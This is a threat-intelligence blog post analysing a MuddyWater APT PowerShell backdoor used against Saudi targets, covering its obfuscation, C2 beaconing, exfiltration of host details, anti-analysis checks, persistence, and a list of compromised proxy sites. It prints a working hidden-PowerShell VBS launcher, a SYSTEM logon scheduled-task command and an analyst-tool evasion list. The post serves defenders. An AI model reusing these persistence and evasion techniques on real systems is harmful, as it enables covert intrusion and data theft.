Summary In September of 2017, the Saudi government was targeted in a cyber attack by means of a malicious PowerShell script deployed using a Microsoft Word macro. This attack enabled MuddyWater Advanced Persistent Threat (APT) operators the ability to conduct cyber espionage operations on the Saudi government. The malicious script communicated through compromised websites using the sites as proxies until finally reaching the command and control servers. Recently, experts at the Saudi National Cyber Security Centre (NCSC) published an alert regarding a second MuddyWater APT attack. This incident had subtle differences from the previous attack using a malicious Microsoft Word document spawning PowerShell scripts, spotted during a spear phishing campaign targeting Saudi Arabia. The scope of this attack is not clear, however, the DarkMatter Malware Research Lab noticed that a couple of Saudi and UAE websites were hacked and then used as proxies supporting this attack. This APT attack is more stealthy and evasive than the one from September, rendering it more successful. This blog post will highlight the differences between this and the earlier attack, and we will share the new Tactics, Techniques and Procedures (TTPs) used by MuddyWater APT to effectively evade the security measures in place. MuddyWater APT is a copycat threat actor relying on known and publicly available tools and scripts, using little custom code, and initially stealing little information from the infected systems (e.g., OS information, hostname, username and IP). The script deployed beacons in a generic way through randomly selected legitimate hacked websites used as proxies with the ability to execute the operators commands, making it a powerful stealthy tool for exfiltration. DarkMatter Malware Research Lab conducted analysis on this second attack highlighting the latest sophistications and development that this APT actor engaged since September.

https://www.moi.gov.sa/wps/portal/ncsc/home/Alerts/!ut/p/z0/TYzLCoJAFIZfpU1LOWe8pNtJ09BCIgI9m2EahpqSMVOsx09x0-bjv_EDQQVk5WhucjCtlc3ka9oIxpJo72Z4KMMiQb49ndPAyzx-RMiB_gdRGvvI86i44K70EHF-MI-uIw6kWjvo7wCVVb1qzHWNs5ioP_3ClXyruxn10og5Eixw0HdcZKEU2sLrSfU

Technical Analysis: Samples analysed: sha256 filename 74990a1d4f25c6b6b3edc937c5a2cd349a3f540eb66d40ee189b51e333ade77b

system.ps1

5a3506a12a4d8d99648e58661f2306ec091d4890cb21900b50694d5487212de2

system.ps1

b2c10621c9c901f0f692cae0306baa840105231f35e6ec36e41b88eebd46df4c

system.ps1

Found using one of our experimental YARA rules:

One of the first differences noted from the September version is that the PowerShell script comes heavily obfuscated using invoke-obfuscation, a PowerShell Obfuscator framework. The code snippet below shows the obfuscated form of this script:

Heavily obfuscated PowerShell script code snippet

The attackers used a token-level obfuscation that persists all the way through the ScriptBlock Level in the Windows Event logger. This approach guaranteed an effective AV bypass on the target systems, and therefore effective against most signature based AV's scanning through the Windows 10 AMSI. Bellow an event captured resulting from this script execution in Windows 10 showing the persisted token level obfuscation:

Dark Matter was able to de-obfuscate statically the whole script. The most notable differences in this new version are:

Usage of invoke-obfuscation framework Dropped from the macro directly No more downloads from file sharing websites like Pastebin, Filebin or GitHub Different URL parameters and callbacks encoding Different code structure Different user ID format Usage of anti-analysis checks New proxy list

Configuration data This script has its configuration data embedded, and as with the code, the configuration data is protected with the aforementioned obfuscation. The configuration data contains the following respectively:

A variable {IP} representing C2 IP address and port: http://148.251.204[.]131:8060 A variable {ID} set to null, this variable will receive the unique ID key identifying a victim A variable {CS} set to 1024, represents size of data chunks sent to the C2 A variable {m} set to "bmxDJY+=" used to obfuscate network traffic A variable {r} set to "@*$()|[_" used to obfuscate network traffic A variable {k} set to BitDifender name of a registry key storing the proxy urls. A variable {s_path} pointing to the persistence directory, here set to

C:\Users\Public\Documents A variable {TSK} having its value set to the path to a VBS script:

C:\Users\Public\Documents\system.vbs

http://148.251.204%5B.%5D131:8060/

Finally, a variable {Proxy} containing a list of hacked websites, used by this malware as proxies (full list attached in the appendix)

o http://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c= o https://www[.]spearhead-training[.]com/work[.]php?c= o https://www[.]spearhead-training[.]com//html/power[.]php?c= o http://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c= o ... The main routine: The main function differs from the previous version, the later version runs anti-analysis stub isdeugenv at the beginning of execution and before every newly received C2 command to execute, below is the function de-obfuscated:

Main routine Once the script makes sure it isnt running in an analysis environment, it stores the proxy list in a registry key named BitDifender in HKLM\Software and HKCU\Software:

Registry key storing proxy list The script then calls getkey function and waits indefinitely until a file named current_user.dat is created in the configured persistence directory here:

%Public%\Documents, eventually making this an anti-sandbox trick if the sample is analysed offline. The getkey function will call the register function (see below) to register the new victim and gain the unique ID from the server. This unique identifier (supposedly to be unique per victim), is 32 characters long and its value is matched every time (for every read and write) with the following regular expression: ^[a-f0-9]{32}$. Once this ID is retrieved, it is parsed with the above regxep and then stored in the .dat file. Going further, this ID is sent in every C2 transaction helping C2 to identify the victims. Below is a victim ID example: a=g&b=9e97c5bd9d39f2f4a59c0506141dfc9f

Finally, if the .dat file is created, it means the PowerShell script successfully registered the victim, the script will then run into an infinite loop waiting for C2 commands to execute. Beaconing, C2 registration, data Exfiltration: This script differs from the previous version, with the registration process being handled with the function called register as seen below:

Register function This function basically registers the victim, and retrieves and ID from the C2 server. The victim registration goes with stolen information, extracted using WMI queries. Below is the information sent to the C2 when the victim first registers:

Computer name Username Operating system architecture, name and version and path to %systemroot% Current IP address

Example of information stolen from a Windows 7 32 bits machine: a=r&b=6InmkFj5Is~~BObxfI0~~32-bit|6.1.7601|Microsoft Windows 7 Home Premium |C:\Windows~~192.168.56.23

Stolen info from target machine

This information is sent encoded using the following custom algorithm:

Base64 encode the string Bytes swapping each character present in column in to its equivalent in column out:

in out

b @

m *

x $

D (

J )

Y |

+ [

= _

Giving it the following final form:

Below, a quick re-implementation of the decoding algorithm in Python 2x:

Python decoding function

The proxy configuration is setup by choosing one proxy from the proxy list, each time randomly, which makes this PowerShell backdoor very effective and evasive on the network. Below de-obfuscated httpget function used to communicate through the proxies:

GET /?p=|T1y)*I9Nklu@WtGajV)c35[Qk9ieGZ)MH5[MzIt|*l0f(|uMS43NjA$fE1p|3)vc29*dCBXaW5k@3 dzI(cgSG9tZSBQc*VtaXVtIH$(Ol$XaW5k@3dzfn4$OTIuMT|4LjU2LjIz HTTP/1.1

Httpget function Note: if a proxy is chosen, the request is re-encoded a second time in base64. If no proxy can be used, the PowerShell fall back directly to the C2 server encoding data using the previous custom encoding algorithm.

Executing C2 commands: Similar to the previous attack, this backdoor will execute C2 commands and return the results encoded. The URL parameters as well as command separators were modified in this version, below is the de-obfuscated code of getCommand function:

getcommand function The command results are sent via a function named sendResult using different URL parameters from the previous version, sending 1024 byte chunks at a time. Below is the function fully de-obfuscated:

sendresult function The operators have the ability to update the PowerShell script through this PowerShell command execution mechanism. The updates seen so far are the following:

Updates in the proxy list and/or C2 server Updates in the anti-analysis function

Of course, the operators also have the ability to update the whole PowerShell script at any time. Finally Dark Matter observed instances where operators had the ability to inject Meterpreter into the infected systems memory, using PowerShell reflection payloads, giving them limitless power over targets.

Persistence Mechanism: A Run key named Windows Optimizations is created in both:

HKLM:SOFTWARE{0}Microsoft{0}Windows{0}CurrentVersion{0}Run HKCU:SOFTWARE{0}Microsoft{0}Windows{0}CurrentVersion{0}Run

Having the content: wscript followed by the VBS file path here:

C:\Users\Public\Documents\system.vbs As with the previous variant, this script is basically a launcher for the malicious PowerShell script present in the persistence directory. Set objShell = WScript.CreateObject("WScript.Shell") command = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -file C:\Users\Public\Documents\system.ps1" objShell.Run command,0 Set objShell = Nothing

Both system.ps1 and system.vbs are stored as hidden system files on the disk in the persistence directory. Finally, a task is added in the task scheduler running the launcher on every log-on: schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsOptimizationsService /TR "wscript %PUBLIC%\Documents\system.vbs" /F

Anti-analysis: The script runs an anti-analysis stub isdeugenv, checking if the process listing matches any of the common tools used by malware analysts. This script basically runs PowerShell ps command and compares the resulting list of running processes with the following list and calls exit if a match is found: Ollydbg, ProcessHacker, tcpview, autoruns, autorunsc, filemon, procmon, regmon, procexp, idaq, idaq64, ImmunityDebugger, Wireshark, dumpcap, HookExplorerkhP, ImportREC, PETools, LordPE, dumpcap, SysInspector, proc_analyzer, sysAnalkhPyzer, sniff_hit, windbg, joeboxcontrol, joeboxserver, win32_remote, win64_remote64

Conclusion The attackers left a message in the script saying, panda was here :). This message is printed if the registry key BitDifender already exists during the installation process. A message means the machine is already infected, and leaves us with the only signature specific to this APT actor:

As seen before in numerous targeted attacks, the use of PowerShell has become mainstream. It provides attackers with ease of use and gives them interfaces and bindings to many Windows OS components while running fully in memory. If used correctly, a PowerShell attack can be stealthy and undetectable. Frameworks like invoke-obfuscation will only raise the bar temporarily to security vendors until they catch up. Seeing it used by attackers isnt really a surprising fact, especially when dealing with copycat actors. The real difficulty with these attacks becomes the attribution. Indeed, copycat actors will imitate other attackers relying on open source tools, and wont give away any hint pinpointing to them directly, allowing them to hide in plain sight. But in the case of the MuddyWater APT things are different. Despite having similarities with copycat actors, the operators have used the same open source tools since February with very few modifications. They target the same government entities, and respond effectively and quickly to any public release disclosing their TTPs by sending an updated version of their scripts to the targets. Copycat actors usually have a good level of Operational Security. MuddyWater APT does not and its operators made a couple of mistakes that helped track them. Dark Matter urges customers to activate logs, specifically PowerShell ScriptBlock logging level. This mode logs scripts as they are executed, which could strip away several layers of obfuscation eventually. Invoke-obfuscation is still persistent at the ScriptBlock, but can still leave traces of its usage; signs of suspicious activity that can be interpreted by careful analysts. Its important to mention that advanced attackers can surgically edit Windows event logs, and one solution is to stream the logs in real-time to a SIEM solution. This procedure can help incident responders discover inconsistencies by the time attackers undertake a log modification. The remote SIEM server should be trusted with a minimal attack surface and locked down.

Appendix Proxy list: http://www[.]4seasonrentacar[.]com/viewsure/data[.]aspx?c= http://www[.]vanessajackson[.]co[.]uk/work[.]php?c= https://www[.]spearhead-training[.]com/work[.]php?c= http://www[.]nigelwhitfield[.]com/v2/work[.]php?c= https://www[.]spearhead-training[.]com//html/power[.]php?c= http://www[.]elev8tor[.]com/show-work[.]php?c= http://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c= http://mainandstrand[.]com/work[.]php?c= http://watyanagr[.]nfe[.]go[.]th/watyanagr/power[.]php?c= http://www[.]jdarchs[.]com/work[.]php?c= http://www[.]akhtaredanesh[.]com/d/file/sym/work[.]php?c= http://106[.]187[.]38[.]21/short_qr/work[.]php?c= http://www[.]akhtaredanesh[.]com/d/oschool/power[.]php?c= http://www[.]arcadecreative[.]com/work[.]php?c= http://camco[.]com[.]pk/Controls/data[.]aspx?c= http://whiver[.]in/power[.]php?c= http://cgss[.]com[.]pk/data[.]aspx?c= http://feribschat[.]eu/logs[.]php?c= http://azmwn[.]suliparwarda[.]com/wp-content/plugins/wpdatatables/panda[.]php?c= http://www[.]armaholic[.]com/list[.]php?c= http://azmwn[.]suliparwarda[.]com/wp-content/themes/twentyfifteen/logs[.]php?c= http://www[.]eapa[.]org/asphalt[.]php?c= http://suliparwarda[.]com/wp-content/plugins/entry-views/work[.]php?c= http://www[.]shapingtomorrowsworld[.]org/category[.]php?c= http://suliparwarda[.]com/wp-content/themes/twentyfifteen/work[.]php?c= http://bangortalk[.]org[.]uk/speakers[.]php?c= https://wallpapercase[.]com/wp-includes/customize/logs[.]php?c= http://www[.]ridefox[.]com/content[.]php?c= https://wallpapercase[.]com/wp-content/themes/twentyfifteen/logs[.]php?c= https://coa[.]inducks[.]org/publication[.]php?c= http://www[.]yaran[.]co//wp-content/plugins/so-masonry/logs[.]php?c= http://www[.]dafc[.]co[.]uk/news[.]php?c= http://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c= https://mhtevents[.]com/account[.]php?c= http://www[.]asan-max[.]com/files/articles/css[.]aspx?c= http://best2[.]thebestconference[.]org/ccb/browse_cat[.]php?c= http://www[.]asan-max[.]com/files/articles/large/css[.]aspx?c= http://www[.]mitegen[.]com/mic_catalog[.]php?c= http://magical-energy[.]com/css/css[.]aspx?c= http://www[.]pomegranates[.]org/index[.]php?c= http://magical-energy[.]com/css[.]aspx?c= http://www[.]autotrans[.]hr/index[.]php?c= http://arbiogaz[.]com/upload/work[.]php?c= https://skepticalscience[.]com/graphics[.]php?c= http://ghanaconsulate[.]com[.]pk/data[.]aspx?c= http://tmclub[.]eu/clubdata[.]php?c=

http://www[.]kunkrooann[.]com/inc/work[.]php?c= http://www[.]ztm[.]waw[.]pl/pop[.]php?c= http://school[.]suliparwarda[.]com/components/com_akeeba/work[.]php?c= http://www[.]mackellarscreenworks[.]com/work[.]php?c= http://school[.]suliparwarda[.]com/plugins/editors/codemirror/work[.]php?c= http://www[.]arcadecreative[.]com/work[.]php?c= http://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c= https://www[.]spearhead-training[.]com/work[.]php?c= https://www[.]spearhead-training[.]com//html/power[.]php?c= http://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c= http://watyanagr[.]nfe[.]go[.]th/watyanagr/power[.]php?c= http://www[.]akhtaredanesh[.]com/d/file/sym/work[.]php?c= http://www[.]akhtaredanesh[.]com/d/oschool/power[.]php?c= http://cbpexbrasilia[.]com[.]br/wp-includes/widgets/work[.]php?c= http://cbpexbrasilia[.]com[.]br/wp-content/plugins/wordpress-seo/power[.]php?c= http://azmwn[.]suliparwarda[.]com/wp-content/plugins/wpdatatables/panda[.]php?c= http://azmwn[.]suliparwarda[.]com/wp- content/themes/twentyfifteen/logs[.]php?c= http://suliparwarda[.]com/includes/panda[.]php?c= http://suliparwarda[.]com/layouts/joomla/logs[.]php?c= https://wallpapercase[.]com/wp-includes/customize/logs[.]php?c= https://wallpapercase[.]com/wp-content/themes/twentyfifteen/logs[.]php?c= http://www[.]yaran[.]co//wp-content/plugins/so-masonry/logs[.]php?c= http://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c= http://www[.]asan-max[.]com/files/articles/css[.]aspx?c= http://www[.]asan-max[.]com/files/articles/large/css[.]aspx?c= http://magical-energy[.]com/css/css[.]aspx?c= http://magical-energy[.]com/css[.]aspx?c= http://riyadhfoods[.]com/css/edu[.]aspx?c= http://riyadhfoods[.]com/jquery-ui/js/jquery[.]aspx?c= http://www[.]kunkrooann[.]com/inc/work[.]php?c=

About the author Taha Karim is Lead Security Researcher within DarkMatters xen1thLabs. For additional information, email contactus@darkmatter.ae

mailto:contactus@darkmatter.ae

SummaryTechnical Analysis:Configuration dataThe main routine:Beaconing, C2 registration, data Exfiltration:Executing C2 commands:Persistence Mechanism:Anti-analysis:

ConclusionAppendixProxy list: